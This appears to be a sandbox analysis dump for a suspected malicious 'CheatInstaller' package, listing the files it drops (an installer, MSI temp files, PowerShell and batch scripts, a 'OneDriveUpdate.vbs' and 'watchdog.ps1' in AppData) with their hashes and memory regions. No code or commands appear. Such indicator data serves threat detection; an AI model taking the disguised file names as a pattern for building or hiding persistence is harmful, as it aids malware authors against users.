C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe

MD5 b86013bc1a4c11e0db3284d72279c44b
SHA1 debbf2953b43f55f47b76dc487406345733f3150
SHA256 b13f7407789e12149e79c43761407fdf4723e2741d555c89b4f9f51cf1006583
SHA512 d477021586938a277f4d8e322e67d7d67eb64c70de19bf22a4f0c3d7d8c6e63467c8c2931734d90ab6f06ef2657d024075c8f641def2fffd55ce98559939c311

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe

MD5 866cdaee439b2f7259b74972346b612a
SHA1 2c6492069897241424cf1452f2a683afc6daf3a2
SHA256 31d3f0242af3dc943b55ca910d0b229dd5a0e84c6383771a074b60f053529c1f
SHA512 76d667ce1a51aa637da85e25edfc443339b7d8c2708e821b0eff4c00802a8facfa5bee432d005c54164232c286429a2f9cfea3041fcfd2d9537d03fe82ab490b

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 88d6ef66043282511d78477c3457cd05
SHA1 dedf2529b0f78f9d7dfe5519d080fe1d11fb0344
SHA256 82efcbda4a568f2e898f2c97d3876af8c4c42f2638a339b937b01202bb83fb4a
SHA512 506e03b18e11c6133eb4b997bfd017ab5e5ed7a253e0470ee391d8bf5f86196742b57ec03316f1d5699f7a2f556df38468c539a6ff70c52e092bf0c1de61fa2b

C:\Users\Admin\AppData\Local\Temp\MSIF195.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSIF3AA.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Windows\Installer\MSIFE79.tmp

MD5 a8338e7b3ce49ab7e793952765ac998f
SHA1 29a2dd67eba553530f84f9e02266474ea678abdd
SHA256 6fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d
SHA512 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f

memory/1864-3595-0x0000016AB7370000-0x0000016AB7392000-memory.dmp

memory/1864-3598-0x0000016A9EC90000-0x0000016A9ECA0000-memory.dmp

memory/1864-3597-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/1864-3600-0x0000016A9EC90000-0x0000016A9ECA0000-memory.dmp

memory/1864-3601-0x0000016AB7520000-0x0000016AB7596000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pssFF91.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tccedvs1.jrm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\scrFF7F.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\scrFF80.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 d3dff05f50e0edcecca77d97468a1aef
SHA1 87a217697bd981c8a9dc5a94ae65daf3ece5f081
SHA256 86cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e
SHA512 0b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005

memory/1864-3701-0x0000016A9EC90000-0x0000016A9ECA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\progressgood.bat

MD5 845cf6630a4a8d184f93d0f732feb846
SHA1 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA256 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512 bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e

memory/1864-3728-0x0000016A9EC90000-0x0000016A9ECA0000-memory.dmp

memory/1864-3741-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

C:\Windows\Installer\MSI109D.tmp

MD5 2557173f4299722afce46cc3c0616406
SHA1 b0343c9a9552be977834e415783b486c4714fe97
SHA256 e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591
SHA512 24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt

MD5 5b1a12edc7b4e82163e5b39694e5b630
SHA1 088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA512 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav

MD5 5392a5fb1c3d0ce48ee2f6db8c8c157c
SHA1 694ad4d5939fa7d468399150a026a3efce6773bf
SHA256 1033b1227e5a7814b34221274272b384f0f8ddbe31a600ff070ef1f0c1fee901
SHA512 1a0ce0c2c5d4818eb83f38c4c3328eb4aab653a625e0e1fca5338e23f955d4da206c3b0bb3106a89736e69077f75079a3bc54fdc458cebe7389cc8a727e31988

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav

MD5 1f17c039e805f0366322565c65c44a96
SHA1 58f9a9787e412e22bdfdf80ee989cd0ca76b7ec6
SHA256 618f46233cb90b39d0da37f37033c0f181ece8583f814ce41c11d1a4d5c49666
SHA512 2980f1616f9cc569cc5ecbaa6c71016488867bf0d2c53b51dedd828f5da12921c3582de61f127ca566f5d35c9398af6aa4bc3600845ef569fc8ec5388bdf7dca

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv

MD5 2620f56f03159589486b831d9b6adc4a
SHA1 55dfc135be75692bd64c50b429dcd5460e0b0b90
SHA256 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA512 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs

MD5 214ee30dbd649af9294f254fc8c33d07
SHA1 e81a7486c5c19868abb7d39fc757f686c4124662
SHA256 d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512 f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1

MD5 beceb9c4ac840a5ac0b51d8774e63149
SHA1 ea375fee5ff404065ba724e877c9a9b01509353b
SHA256 d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA512 48e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav

MD5 50ef295bd5d596d5edf3d2905e4f5020
SHA1 99ba82071df6b5790e92ccb9588fbcc9f92d4458
SHA256 f64a825a0ad6f97060458532a61c3620e2fd71eefbe80149761abfb146fc4907
SHA512 9b67d85def8732960a377646a0ddc98bddcd7e2578f7ddb7047acb07e62483cd8707f594f6e93f78c67729917c96af5f13c7aa37bbad3505c9b5f93e7e93a9aa

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.frm

MD5 ac330f2a89a6c828059d1f125cb9cb60
SHA1 a40b10eae1fba1ea43ff70b3941a165d6d0502f2
SHA256 9b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec
SHA512 0fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI

MD5 63b9196a2025286d719198ee9edc9371
SHA1 2e288dcecddb52ec385c87f6e4711b87a6ed1d48
SHA256 914b995201443dcdea73e149fd2a3a43c63a9f3f5aed3c05cd46c64b4644de48
SHA512 16d3f94ea80c161e8a531f94b2dcb5bb6baaf1a9968aff8fe2bc243e4ddc730277e27ef344955bf0452314b91347f3c305d07cf0b00f2e14fe56f36afca2f8d7

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav

MD5 5acab132e4baf883d7f785fabf624952
SHA1 dcd1e3fe209cea31e72531e1484b6bb156347308
SHA256 e14563629a67f07764f12cfae343d8ddb0309cbda241391d095fbb6109302dd1
SHA512 714ed7d425424006fbf248c2e5b95e6525f4abc6e563ecf544fe52f12881af7cf8bd73e790657766e545e753c23f1bd363dde8b6faba675bca147a22cc802c3c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav

MD5 639eb4627992165dad32ad41df746bf7
SHA1 286d70c527d4a0d03c5feb0348f6d6e507afaaed
SHA256 fb5a9508c75910052b7761a50028084912581eec358f6378d5865a531b71ca64
SHA512 886c1453dac99f4ebf8e3918641da602a0bd062a0111e4187be6a9ea4b11182db2d093ce8f28a21347645b74b67aa6c9d0fb1970a521e4ad8c6f0626864e8640

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav

MD5 82e152e8a610da8132789c9d4a4d1d3f
SHA1 055180b27a639248c3be0b2d875630ae256d9890
SHA256 82040461eebb7aaf3c6055884abcc642300ff37d241a1b7ee794e0b0b45b88d7
SHA512 77e525487b3d7be2d473fc296445bfb2c06ec9ddd0cb5c0b174e40101f98326d48fd2da797e327b1fb333e5ea56fd5d1ef14582e92a5591e60da3260619c67bf

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav

MD5 b1938437bfc4c13e424990f4d3f2353a
SHA1 fc63b1e664c5ea8faa8b5df75a2756e59ae7a40a
SHA256 d531ed6375a6ade4d449389b67e0a312fc97f3fbd025a627abd72f2705fdbc26
SHA512 680179878406763eb57112fcd942f58fcf089b6fc6c6a7b19ee0fe2ec69b5eca218539afb8d10c55b6901b273cfae93dec52e8a3a46f5e8aa684079be70547ab

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav

MD5 123437d6f80fe45f397a067ce4872d89
SHA1 3b981369c54593b4dcfd3f7e08db8f3e67a3fba9
SHA256 25289632dccc370b326d589d06169c7383c0a39b6d220dd468a01c785d54abf9
SHA512 25b245f916b58cd359ee017cf48171cc3624c87e7941565db5ae9d06fb3cb6a68423f4c39cc38c8a66bbe280e2a048a04d84d83700d35ed5c537d4d6525eb623

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav

MD5 189ae0c626d6d7287e0ffed4389ccb05
SHA1 ec64c9f7b9fa6d6879793317e8431ac69338ddb8
SHA256 f43a43e58ecd71a43a1393a6c6a3056228e525963704ed75ae04bd5fbcd2305f
SHA512 973e344a2d266a1eb1bd848945c3cfcc16e5c4f0aa9e71f6fdfd96b9e7a18cbca630239257bf69b0922dae275e364068609be6d42f6a6209e853b2ff0600790c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_topic.frm

MD5 ccaca741f4002cb8af48d485501ec8e9
SHA1 4895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3
SHA256 0e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1
SHA512 09f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\general_log.frm

MD5 ea26bb989e3e2c321a47d499d2682ae1
SHA1 a79e8c99186c20fb09f1457b3d183538e1e1b1bb
SHA256 4a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81
SHA512 07f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav

MD5 f764169bffe65099eda80ace5f90e046
SHA1 82bcaec9920ffabc3c6ea08a277511c2e871b230
SHA256 88341a5ee3600529b8026d421d2b6004299d9bc3d89bdb3e2a8643cca107f3ed
SHA512 3eedf74feb8a30e2ddb6767b25580625e7d200e34e8a20a7412bc4e60d8ca5194c7d2436a632cedc676d93841a560bd0de9470d48f6eee4a4ad3b7d5f4064d80

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI

MD5 f0bb4307afbd586f0499f4023213863d
SHA1 cd978f445f02aab75b1d89c5e28e348860d8c306
SHA256 49a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129
SHA512 a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav

MD5 84cb9d76404e7060326ed19dc51a9a1f
SHA1 5945326bbc8b4e48afbea13f8c2cf564ffbafbee
SHA256 c6ca1f7b252c74ae234c25f37b8eb0122945be66701bf22486c3c27de8d9908b
SHA512 95f3fdab34ef9a3c4b797a50c2b00d068da4d309e6aad2b288c140d71a5ef45f182d36a97b99768f50fc226217b7b7ab6d4a4ba3ede529efa801cdbfea575d28

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\slow_log.frm

MD5 5cf177c70e9be2f41adc86ea7e0fc48b
SHA1 9a597f4d25a0fb4837fa06b9b3792de65fae9551
SHA256 9276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3
SHA512 054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_sc09.wav

MD5 f759d9f3f35dda05908011fcaed1d018
SHA1 0a7852907851700f7424094b7658d78743559dae
SHA256 1780f4481aae5bc51fb79a42d92946ade0c5459efd99daa67bf2d1dcae275919
SHA512 6cb7ab0ac9cb17d194b2a635dab9e5934d36623be7c126785cd83e1d98fe55a262068bc2676fd1499a07a1160005aff7d6199e9be544fad4581debcddf1b0390

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_ita.txt

MD5 89e2a161df2ef245781707ff93e978bc
SHA1 ab2189d5c8dca09cade0586b929f0264c327db32
SHA256 b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a
SHA512 0e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav

MD5 de35645b9bca5dee784285ee52aa407e
SHA1 3e23801fba4d83ef2c8f2ed772b0aedd8b1395b9
SHA256 a5289b50b6178e8b4c3ea814a0c25cf4b4c2c8e3a0e30e416dbdac49a61d3864
SHA512 78c8ba646941d8806fddaa6a0ba1154daa1463703651d625a230422374b157d63bd2959fa8b561cc1e9e40b5601b65f36aae85d158d85cdf0460e5e7f637a17d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav

MD5 eff17d20b4dab6510c36218f00218602
SHA1 7264514de1d541451d3533812a36bbb2eadab1b8
SHA256 a0765c16963caa13ed260b44ecd3f99d0cbddf21d4bf0aa814379bb8e9a96470
SHA512 5460ad1e42835a91783e566030d5e8eab449e29517b17581db09175439d5c1bbe173554d0ac33eb60f0c5cd52255b12574d61d12411e253006c53564aceab072

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav

MD5 1428d595918ab12da96d7accb8a42c1d
SHA1 aa263ebb0cab9c18b582b4e407d3ffd936e83d65
SHA256 d5c8cbee6fb398f36abfab142f33d4824c47e426c4d1563e5f7310c9d972b8c2
SHA512 8948ca52fc5981bac7e8ca2e4e03ae6e002975b19db32ef4adb143fc3c5ee9e3ab19e0ebe7ad5833beff96b2b32e682bd9d2270abc0d6e86e792f8687626a7a6

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav

MD5 4a1d53e7fd0f268a7fd23fb9b3139ee3
SHA1 a80942c3cab97ea97b2406fab965bb4b3c16c2fe
SHA256 7832608e235911200d1c224c201d3aefefe3b154911a53c2507cd83e31447c1f
SHA512 cc00e720b65246bd0ad30dec09a35a5bc0f409645f47d8576649036408a258b7a372c0e4f5f16b222a9965a92cd2dd03fd6f782bec5f1a85438a339c310dfd01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav

MD5 5b88b489ce5a9207f1b60669d32f7a0e
SHA1 d2ba6f65e8091324b5042baefd58bde2177fa724
SHA256 216fdaac90960ee05ff540fe214cfdc314b4ae57892437c940eb7b0edb9bc87f
SHA512 df3bf926e4c85adc21599348442b4e8093885030d9dd0fda3ea0a50606cfd1cd805ee89cdd7f43c48863671e68309955fac14e50bb157590e6984a2233333b29

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_drums.wav

MD5 149cd5cc6a68e10130db2c4a03d71de0
SHA1 4be908d4048eebb86e3b5c95964c4bc156282dda
SHA256 6a30422fce563f3a084020eb86a3a728c3cf1eb04506e081e0fa7bbca9b54ee1
SHA512 478038839937cbf277534635da1561b9d448ecd3b51ca00f1109417a45969777e2b523ecc065f781599e7cb4a2b80acfeedb7528e8fe8683c4b3d7788a38047e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav

MD5 0390e78a8086536f56e11b0b40be2d62
SHA1 ba61e82cce9e0ef301db174f83e94b9244faa799
SHA256 9102b9e757cea1fddffd0f82888ff829af7f11f6c522a31939fd54daf0b3aa22
SHA512 6182190e88ccbbb060a6779b97e27794aa69252f4196b307165006d57234aeee62283c1cfb41d405847c5079d3828706cab648281d40dafaf9cb10984868b1e9

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav

MD5 0f9223e9fdb356d794ebef388a0bf432
SHA1 4ceede02e49e2fae1a3851b3ff58de226b2ca970
SHA256 e99d3f16c079d80c3f8ee5f897828a0d2934a6c7c0170d17ad6db3a0ce9c52d1
SHA512 4b89e85b19f760f025e06e338107834fa5e02fd58197166228cf664c09ba1335dbf2056a55a3015dce933db7e4e04893592f99768be79e4d79328007e9e183b6

C:\Windows\Installer\MSI392C.tmp

MD5 cac17c92ed0d30bc68ce60905e0af1ea
SHA1 29589b5816214f537ffb03a4ff9c79f1bd25908b
SHA256 e5a59959b68626f622c7a27b2a42468dbfe03a6d956b58b2cdccedf0a632d161
SHA512 041aab2032745c2f800ac05ee77073167bf37f81dee56774b498c8f1b60fdcc8f16904e909ed42ef9157dfebeada9998d5c155aa1a10df1ccd608177425acc20

C:\Windows\Installer\MSI3D65.tmp

MD5 165f730f078c7019ea5f2642f8208cda
SHA1 370f2e4d1f298b62c1d4743d0e23d2a2d41f950d
SHA256 48f509d74ca1afa44b3053e5fb0ddc15d56ca8844e9d150419891c5a38a071a6
SHA512 36868c499b28f96853fb77a1dacef2ad2a06ee7b1be41ff2782ac0f90dd247f522dc64951fa72bb77a85d930ddffe28b06eb391e5bf803e396adaa7211c183b6

memory/2104-3919-0x0000000070690000-0x0000000070D7E000-memory.dmp

memory/2104-3920-0x00000000010B0000-0x00000000010C0000-memory.dmp

memory/2104-3921-0x0000000000FF0000-0x0000000001026000-memory.dmp

memory/2104-3922-0x00000000010B0000-0x00000000010C0000-memory.dmp

memory/2104-3925-0x0000000006E60000-0x0000000007488000-memory.dmp

memory/4256-3927-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/4256-3929-0x0000021ED5DA0000-0x0000021ED5DB0000-memory.dmp

memory/4256-3930-0x0000021ED5DA0000-0x0000021ED5DB0000-memory.dmp

memory/2104-3933-0x0000000006AE0000-0x0000000006B02000-memory.dmp

memory/2104-3942-0x0000000006B80000-0x0000000006BE6000-memory.dmp

memory/2104-3946-0x0000000006D60000-0x0000000006DC6000-memory.dmp

memory/4256-3948-0x0000021ED5DA0000-0x0000021ED5DB0000-memory.dmp

memory/2104-3949-0x0000000007530000-0x0000000007880000-memory.dmp

memory/2104-3958-0x0000000006DF0000-0x0000000006E0C000-memory.dmp

memory/2104-3961-0x00000000078D0000-0x000000000791B000-memory.dmp

memory/2104-3972-0x0000000007BA0000-0x0000000007C16000-memory.dmp

memory/4256-3983-0x0000021ED5DA0000-0x0000021ED5DB0000-memory.dmp

memory/4256-3986-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/4556-3992-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/4556-3994-0x0000019073C90000-0x0000019073CA0000-memory.dmp

memory/2104-3995-0x0000000070690000-0x0000000070D7E000-memory.dmp

memory/4556-3996-0x0000019073C90000-0x0000019073CA0000-memory.dmp

memory/4556-4013-0x0000019073C90000-0x0000019073CA0000-memory.dmp

memory/2104-4036-0x00000000090A0000-0x0000000009718000-memory.dmp

memory/2104-4037-0x00000000089F0000-0x0000000008A0A000-memory.dmp

memory/2104-4040-0x00000000010B0000-0x00000000010C0000-memory.dmp

memory/4556-4041-0x0000019073C90000-0x0000019073CA0000-memory.dmp

memory/4556-4046-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/2104-4051-0x00000000010B0000-0x00000000010C0000-memory.dmp

memory/2104-4050-0x0000000008D00000-0x0000000008D94000-memory.dmp

memory/2104-4053-0x0000000008A90000-0x0000000008AB2000-memory.dmp

memory/1000-4056-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/2104-4057-0x0000000009C20000-0x000000000A11E000-memory.dmp

